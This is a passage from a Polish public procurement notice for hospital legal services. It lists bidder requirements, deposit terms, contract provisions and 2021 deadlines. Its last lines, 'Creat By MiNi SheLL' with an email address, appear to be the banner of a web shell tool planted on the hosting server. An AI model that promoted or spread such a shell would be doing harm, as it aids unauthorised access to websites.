stosownego oświadczenia oraz polisy ubezpieczeniowej odpowiedzialności cywilnej na kwotę <br/> nie niższą niż 300.000,00 zł w przeliczeniu na jednego adwokata lub radcę zatrudnionego w kancelarii;<br/>7.1.5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w <br/> odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub <br/> sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim <br/> stosunków prawnych. <br/>7.1.6. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując <br/> zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie <br/> tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie <br/> podmiotu udostępniającego zasoby Wykonawcy ma gwarantować rzeczywisty dostęp do tych zasobów oraz określać w <br/> szczególności:<br/> 7.1.6.1 zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> 7.1.6.2 sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te <br/> zasoby przy wykonywaniu zamówienia;<br/> 7.1.6.3 czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu <br/> do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, <br/> zrealizuje usługi, których wskazane zdolności dotyczą.<br/>7.1.7. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich <br/> sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w <br/> postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 oraz bada, czy nie zachodzą wobec tego podmiotu podstawy <br/> wykluczenia, zgodnie z art. 108. ust.1. oraz art. 109 ust.1 pkt 4. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. <br/> 273 ust 1 pkt 1 ustawy Pzp Wykonawca zobowiązany jest złożyć następujące dokumenty: <br/>7.2.1. Oświadczenie o braku podstaw do wykluczenia zgodne z art. 108 ust.1 ustawy Pzp wg wzoru - ZAŁĄCZNIK NR 3 do <br/> SWZ, <br/>7.2.2. Aktualny odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności <br/> gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem <br/> jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>7.2.3. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń <br/> Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z <br/> opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, a w przypadku zalegania z opłacaniem <br/> podatków lub opłat, składek na ubezpieczenia społeczne i zdrowotne wraz z zaświadczeniem albo innym dokumentem <br/> zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert <br/> Wykonawca dokonał płatności należnych podatków lub opłat, składek na ubezpieczenia społeczne lub zdrowotne wraz z <br/> odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności - wystawionych nie wcześniej <br/> niż 3 miesiące przed upływem terminu wyznaczonego do składania ofert. <br/>7.2.4. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 ustawy Pzp, wystawioną <br/> nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wykazania spełniania przez Wykonawcę warunków o których mowa w art. 112 ustawy Pzp Wykonawca zobowiązany jest do złożenia następujących dokumentów i oświadczeń: <br/>7.1.1.	Zdolność do występowania w obrocie gospodarczym - na potwierdzenie Zamawiający żąda od Wykonawcy prowadzącego działalność gospodarczą lub zawodową dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>7.1.2.	Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, na <br/>potwierdzenie Zamawiający żąda złożenia oświadczenia z art. 273 ustawy Pzp – wg wzoru- ZAŁĄCZNIK NR 2 do SWZ, <br/>7.1.3. Zamawiający żąda następujących podmiotowych środków dowodowych: <br/> 7.1.3.1. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności <br/> odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/> doświadczenia i wykształcenia niezbędnych do wykonania zamówienia pulblicznego, a także zakresu wykonywanych <br/> przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; <br/> 7.1.3.2. Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że osoby wyznaczone do sprawowania <br/> kompleksowej obsługi prawnej posiadają uprawnienia do wykonywania zawodu radcy prawnego lub adwokata, o których <br/> mowa w ustawie z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz. U. z 2020 r. poz.75 z późn. zm .) lub ustawie z dnia <br/> 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz. U. z 2020 r. poz. 1651 z późn. zm .) w ilości co najmniej 2 osób <br/> posiadających co najmniej 5 letnie doświadczenie w wykonywaniu zawodu w tym co najmniej 1 osoba specjalista w <br/> dziedzinie prawa medycznego; posiadania wiedzy i doświadczenia – Zamawiający uzna spełnienie warunku, jeżeli <br/> Wykonawca udokumentuje co najmniej 5 letnie doświadczenie w obsłudze szpitali oraz co najmniej 3 letnie <br/> doświadczenie w obsłudze spółek kapitałowych, w tym także w spółkach akcyjnych – min. 2 lata, prowadzących <br/> działalność leczniczą przy czym działalność ta powinna być prowadzona w szpitalach o min. 200 łóżkach, oraz <br/> udokumentuje, iż w okresie ostatnich 3 lat prowadził min. 2 sprawy sądowe z zakresu błędów medycznych o wartości <br/> przedmiotu sprawy min. 1 000.000,00 zł każda;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca musi posiadać zdolność techniczną i zawodową. Zamawiający uzna warunek za spełniony, jeżeli <br/> Wykonawca udokumentuje, że posiada środki finansowe w ilości umożliwiającej wykonanie przedmiotu zamówienia <br/> poprzez złożenie stosownego oświadczenia oraz polisy ubezpieczeniowej odpowiedzialności cywilnej na kwotę <br/> nie niższą niż 300.000,00 zł w przeliczeniu na jednego adwokata lub radcę zatrudnionego w kancelarii; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawca udokumentuje, że posiada środki finansowe w ilości umożliwiającej wykonanie przedmiotu zamówienia <br/> poprzez złożenie stosownego oświadczenia oraz polisy ubezpieczeniowej odpowiedzialności cywilnej na kwotę <br/> nie niższą niż 300.000,00 zł w przeliczeniu na jednego adwokata lub radcę zatrudnionego w kancelarii; <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pozostałe dokumenty, które Wykonawca składa wraz z ofertą<br/>10.1. Uzupełniony i podpisany dokument pod nazwą formularz oferty - załącznik nr 1 do SWZ<br/>10.2. Oświadczenie dot. obowiązku podatkowego od towarów i usług - załącznik nr 4 do SWZ<br/>10.5. Uzupełniony projekt umowy o dane Wykonawcy - załącznik nr 5 do SWZ <br/>10.6 Oświadczenie dot. RODO - załącznik nr 6 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagania dotyczące wadium<br/> Zamawiający wymaga wniesienia wadium.<br/> Wykonawca zobowiązany jest do wpłacenia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych) <br/> na konto nr 02 1020 3668 0000 5202 0476 2730, w tytule przelewu należy wpisać: „przetarg-obsługa prawna” <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Składanie ofert przez podmioty występujące wspólnie<br/>8.1.	W przypadku złożenia oferty wspólnej przez kilka podmiotów, każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w pkt: 7.2.1. – 7.2.4, natomiast dokumenty wymienione w pkt: 7.1.1.-7.1.4. podmioty składają wspólnie, tj.: warunki w nich określone są spełnione, gdy podmioty składające ofertę spełniają je łącznie. <br/>8.2.	Oferta wspólna musi zostać przygotowana i złożona w następujący sposób: <br/>8.2.1.	podmioty wspólnie składające ofertę ustanawiają i wskazują Pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o <br/>udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego - DO OFERTY NALEŻY DOŁĄCZYĆ PEŁNOMOCNICTWO,<br/>8.2.2.	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty wspólnie składające ofertę ;<br/>8.2.3.	każdy z podmiotów składających wspólnie ofertę musi złożyć oświadczenie, że nie podlega wykluczeniu <br/>z postępowania na podstawie art. 108 ust. 1 ustawy Pzp- ZAŁĄCZNIK NR 3 DO SWZ.<br/>8.3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>8.4. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed <br/> podpisaniem umowy o realizację zamówienia są zobowiązani dostarczyć Zamawiającemu stosowną kopię umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia umowne<br/>17.1. Zamawiający przekazuje wraz z SWZ projektowane postanowienia umowy wraz załącznikami do umowy, która zawiera <br/> wszystkie istotne dla Zamawiającego warunki realizacji zamówienia. Projektowane postanowienia umowy stanowią <br/> załącznik nr 5 do SWZ.<br/>17.2. Zamawiający przewiduje możliwość zmiany zawartej umowy, zgodnie z postanowieniami w/w projektowanymi <br/> postanowieniami umowy. <br/>17.3. Zamawiający zawrze umowę w sprawie zamówienia publicznego w terminie określonym w art. 308 ustawy Pzp. <br/>17.4. Zamawiający prześle Wykonawcy, którego oferta została uznana za najkorzystniejszą, wyniki postępowania za <br/> pośrednictwem poczty elektronicznej, w tym celu należy w ofercie podać adres e-mail. <br/>17.5. Umowa zawierana jest na okres zgodny z terminem wykonania zadania i zostanie przesłana Wykonawcy pocztą w <br/> dwóch egzemplarzach podpisanych ze strony Zamawiającego. Jeden egzemplarz umowy, podpisany należy odesłać na <br/> adres Zamawiającego NIEZWŁOCZNIE PO PODPISANIU, NIE PÓŹNIEJ JEDNAK , NIŻ W CIĄGU PIĘCIU DNI OD JEGO OTRZYMANIA . <br/>17.6.	Zamawiający dopuszcza zawarcie umowy w sprawie zamówienia poprzez podpisanie kwalifikowanym podpisem elektronicznym przez Zamawiającego oraz Wykonawcę.<br/>17.7. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie zamówienia publicznego Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców albo unieważnić postępowanie.<br/>17.8	Złożenie oferty jest jednoznaczne z akceptacją przez Wykonawcę projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu – zgodnie z opisem w punkcie 15 SWZ,</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9. Wykonawcy mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej<br/> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, składa:<br/> 9.1.1. oświadczenia i dokumenty o których mowa w pkt . 7.1. <br/> 9.1.2. oświadczenie o którym mowa w pkt 7.2.1.<br/>9.1.3. ppkt 7.2.2 - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/><br/> Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie <br/> zamówienia<br/>19.1. Wykonawcom, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może <br/> ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy, przysługują środki ochrony prawnej na <br/> zasadach przewidzianych w dziale IX ustawy Pzp.( art. 505-590).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com